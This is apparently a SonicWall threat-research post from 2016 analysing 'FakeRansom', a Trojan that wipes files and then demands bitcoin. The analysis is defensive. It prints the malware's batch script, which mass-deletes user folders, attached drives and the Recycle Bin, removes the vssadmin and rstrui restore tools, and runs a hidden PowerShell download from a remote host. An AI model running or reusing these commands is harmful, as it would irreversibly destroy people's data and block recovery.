FakeRansom: Deletes files then demands payment for nothing (Jul 15th, 2016)

The Sonicwall Threats Research team have observed a new “Ransomware” written by a seemingly lazy author. Traditionally, ransomware authors have a sense of honor and will actually restore files after the victim pays the ransom. This “Ransomware” however does not. It deletes everything in its path with no possibility of recovery. There is no encryption of files on the system. There is no key exchange with a remote key server. There is of course, a bitcoin address provided in order to “retrieve” deleted files. Unless the victim uses an un-delete tool immediately after infection the files are permanently lost.

Infection Cycle:

The Trojan makes the following DNS query and attempts to report the infection to the remote server hosted on Amazon Web Services:

The Trojan adds the following files to the filesystem:

• %APPDATA%winstrsp.exe [Detected as GAV: FakeRansom.A (Trojan)]
• %TEMP%winopen.exewinopen.exe [Detected as GAV: Fakelock.C (Trojan)]
• %TEMP%~8.bat

The Trojan sets itself up to run on reboot using schtasks.exe. The file z544 is an xml file containing the task data:

The Trojan runs winopen.exewinopen.exe which displays the following image and shuts down the system within 1 minute:

It runs ~8.bat. Below is a sample of the instructions contained in the batch script:

@echo off
set folder="%AppData%LocalTemp*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

@echo off
set folder="%USERPROFILE%Desktop*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

@echo off
set folder="C:WindowsSystem32Restore*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

It deletes everything on any attached shared folders:

@echo off
set folder="D:*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

@echo off
set folder="E:*"
cd /d %folder%
for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

@echo off
set Drive=C:
if exist %Drive%$RECYCLE.BIN (
pushd %Drive%$RECYCLE.BIN
del /s /q .
popd
)

It deletes system executables that are responsible for managing system restore points:

@echo off
del "C:WindowsSystem32vssadmin.exe"
timeout /t 2 /nobreak

@echo off
del "C:WindowsSystem32rstrui.exe"
timeout /t 2 /nobreak

The script contains code that uses Windows PowerShell to download the main payment instructions image:

@echo off
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -
windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-
west-1.amazonaws.com/docs.pdf/anon.jpg','%USERPROFILE%DesktopPayment_Instructions.jpg');
cmd /c '%USERPROFILE%DesktopPayment_Instructions.jpg'
timeout /t 200 /nobreak

A quick look at the bitcoin address on blockchain.info shows that the operator has made some income, but not much:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

• GAV: FakeRansom.A (Trojan)
• GAV: Fakelock.C (Trojan)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.